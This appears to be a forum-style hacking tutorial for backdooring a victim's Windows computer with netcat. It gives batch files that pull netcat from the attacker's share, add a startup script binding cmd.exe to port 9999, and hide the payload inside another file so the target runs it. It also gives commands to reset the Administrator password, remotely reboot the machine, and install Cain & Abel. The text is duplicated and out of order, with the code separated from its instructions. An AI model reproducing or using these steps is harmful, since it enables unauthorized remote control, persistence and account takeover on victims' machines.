As we all know, a Trojan is very likely to be picked up by AV, what you need is Netcat, netcat opens a port on a computer for access (If used correctly by a batch file you open a port on a target computer). You will need to write a batch file. The batch file to copy netcat on the remote computer will have to be run from the target computer (The person on the target will have to execute the batch file in some way). Open Notepad and copy this code in:
Save the file as a batch file using Notepad.
The next batch file will be used to make sure the port you specified opens up every time windows starts up, you can specify any port you wish. Open Notepad and type:
Save the file as a batch file using Notepad, this will be the file that is copied into the startup folder in the previous batch file we wrote. You can bind the batch file to another file and share that file, let the target execute that file so that he can copy netcat and the other batch file onto his/hers computer thus opening port 9999, after port 9999 has been opened you can then use telnet and telnet to that port on the target computer to have full access without ever needing any passwords of any sort. After you are in change the Administrator password for if something happens to your files, the command is this:
net user Administrator newpassword
Now from here you can do what you want, e.g try shutting down the target computer by browsing to his system32 folder and then type in:
shutdown -r -t 10 -c "Hello"
the computer will then restart in 10 seconds time. You can even play around more by Installing Cain & Abel on your computer and then installing Abel remotely on his computer (Since you know the Administrator password) Once you have Abel on the target you can start and stop services and do more!
@echo off
cd\
xcopy \\yourIP\shared folder\netcat.exe
copy \\yourIP\shared folder\netcat.exe (just to be sure)
cd "Documents and Settings"
cd "All Users"
cd "Start Menu"
cd Programs
cd Startup
xcopy \\yourIP\shared folder\Startup.bat (This is another batch file you will write)
cd\
netcat.exe -L -p 9999 -d -e cmd.exe
Save the file as a batch file using Notepad.
The next batch file will be used to make sure the port you specified opens up every time windows starts up, you can specify any port you wish. Open Notepad and type:
@echo off
cd\
netcat.exe -L -p 9999 -d -e cmd.exe
Save the file as a batch file using Notepad, this will be the file that is copied into the startup folder in the previous batch file we wrote. You can bind the batch file to another file and share that file, let the target execute that file so that he can copy netcat and the other batch file onto his/hers computer thus opening port 9999, after port 9999 has been opened you can then use telnet and telnet to that port on the target computer to have full access without ever needing any passwords of any sort. After you are in change the Administrator password for if something happens to your files, the command is this:
net user Administrator newpassword
Now from here you can do what you want, e.g try shutting down the target computer by browsing to his system32 folder and then type in:
shutdown -r -t 10 -c "Hello"
the computer will then restart in 10 seconds time. You can even play around more by Installing Cain & Abel on your computer and then installing Abel remotely on his computer (Since you know the Administrator password) Once you have Abel on the target you can start and stop services and do more!
